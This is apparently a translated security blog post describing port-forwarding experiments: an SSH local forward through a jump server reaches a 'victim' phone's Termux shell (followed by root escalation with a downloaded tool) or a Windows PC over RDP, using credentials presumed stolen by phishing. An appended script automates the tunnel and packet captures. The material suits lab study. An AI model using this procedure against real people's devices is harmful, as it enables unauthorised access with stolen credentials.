I did port-forwarding experiments a while back, then forgot about them, so today I am redoing them. The idea: if the Termux application on the victim's phone is exposed through a port forward to a local port on the attacker's machine, the attacker connects to that local port and controls the phone. The same works for RDP remote desktop: forward the remote-desktop port of the victim's computer to a local port, and the attacker logs in to the victim's computer by connecting to their own local port. In both cases the attacker already knows the victim's username and password, obtained beforehand through social engineering, phishing, and the like.
AILX10
Step 1: Set up the SSH local forward and enter the jump server user's password
Step 2: SSH to the forwarded local port and enter the phone user's password
Step 3: Escalate on the phone from an ordinary user to root; there are some pitfalls here (downloading from GitHub)
Run rootme and we become root. Although we got a shell and then escalated from an ordinary user to root, we still cannot reach the phone's own files, because we are still confined inside Termux~
Now let's look at a local forward where the phone is replaced by a computer: through the local forward and the springboard, the attacker logs in to the internal computer~
Step 1: Set up the SSH local forward and enter the jump server user's password
Step 2: SSH to the forwarded local port and enter the computer's username and password
Step 3: The attacker is in, but this is not covert monitoring: Windows client editions allow only one interactive session, so logging in over RDP kicks the victim off their console and leaves them looking at the lock screen~
Step 4: Capture and analyze packets
Scenario 1: From the local to the jump server
Scenario 2: From the jump server to the local machine
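The whole procedure in one script, as an added example that is not the original post's own commands: step 1 opens the SSH local forward through the jump server, step 2 is the second hop through the forwarded port (Termux sshd or RDP), and step 4 captures each leg with tcpdump on the jump server. The jump host, users and addresses are illustrative assumptions; Termux's sshd listens on port 8022 by default and RDP on 3389.

```shell
#!/usr/bin/env bash
# Added example, not the original post's own commands. It wraps the procedure above:
# step 1 opens an SSH local forward through the jump server (springboard) to the
# target, step 2 makes the second hop through the forwarded port, step 4 captures
# each leg with tcpdump. The jump host, users and addresses are illustrative
# assumptions; Termux's sshd listens on 8022 by default, RDP on 3389.
set -eu

JUMP="jumpuser@jump.example.internal"   # assumed springboard
CTRL="/tmp/jump-forward.sock"           # control socket so the tunnel can be torn down

# 0 if $1 is a valid TCP port number, 1 otherwise
valid_port() {
  case "$1" in
    ''|*[!0-9]*) return 1 ;;
  esac
  [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Step 1: command that opens the tunnel. Binding to 127.0.0.1 keeps the forwarded
# port off the attacker's other interfaces, ExitOnForwardFailure makes a port clash
# fail loudly instead of leaving a session with no forward, and -N -f -M -S parks
# the session in the background behind a control socket.
# $1 local port, $2 target host as seen from the jump server, $3 target port
forward_cmd() {
  valid_port "$1" && valid_port "$3" || return 1
  printf 'ssh -N -f -M -S %s -o ExitOnForwardFailure=yes -L 127.0.0.1:%s:%s:%s %s' \
    "$CTRL" "$1" "$2" "$3" "$JUMP"
}

# Step 2: the second hop through the forwarded local port.
# $1 termux|rdp, $2 local port, $3 user on the target
hop_cmd() {
  case "$1" in
    termux) printf 'ssh -p %s %s@127.0.0.1' "$2" "$3" ;;
    rdp)    printf 'xfreerdp /v:127.0.0.1:%s /u:%s' "$2" "$3" ;;
    *)      return 1 ;;
  esac
}

# Step 4: capture one leg on the jump server. Leg 1 (attacker <-> jump) carries the
# outer SSH session; leg 2 (jump <-> target) carries the forwarded connection, which
# on the wire is the inner SSH or RDP session, no longer wrapped by the outer one.
# $1 leg number, $2 peer address, $3 peer port
capture_cmd() {
  valid_port "$3" || return 1
  printf 'tcpdump -ni any -w leg%s.pcap host %s and tcp port %s' "$1" "$2" "$3"
}

case "${1:-}" in
  up)    $(forward_cmd "${2:-2222}" "${3:-10.0.0.5}" "${4:-8022}") ;;   # open the tunnel
  check) ssh -S "$CTRL" -O check "$JUMP" ;;                           # is it still up?
  down)  ssh -S "$CTRL" -O exit "$JUMP" ;;                            # tear it down
  *)     printf 'usage: %s up [lport host rport] | check | down\n' "$0" ;;
esac
```

Run `./forward.sh up 2222 10.0.0.5 8022` for the phone (then `ssh -p 2222 user@127.0.0.1`), or `./forward.sh up 13389 10.0.0.7 3389` for the computer (then `xfreerdp /v:127.0.0.1:13389 /u:user`); `./forward.sh down` closes the tunnel through the control socket instead of leaving a background ssh behind. The leg-2 capture is the one that shows the forwarded protocol directly, which is why a jump server you do not control is also the place where your traffic is most exposed.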
Cybersecurity has a long way to go; time to wash up and sleep~
Posted on 2022-07-09 20:42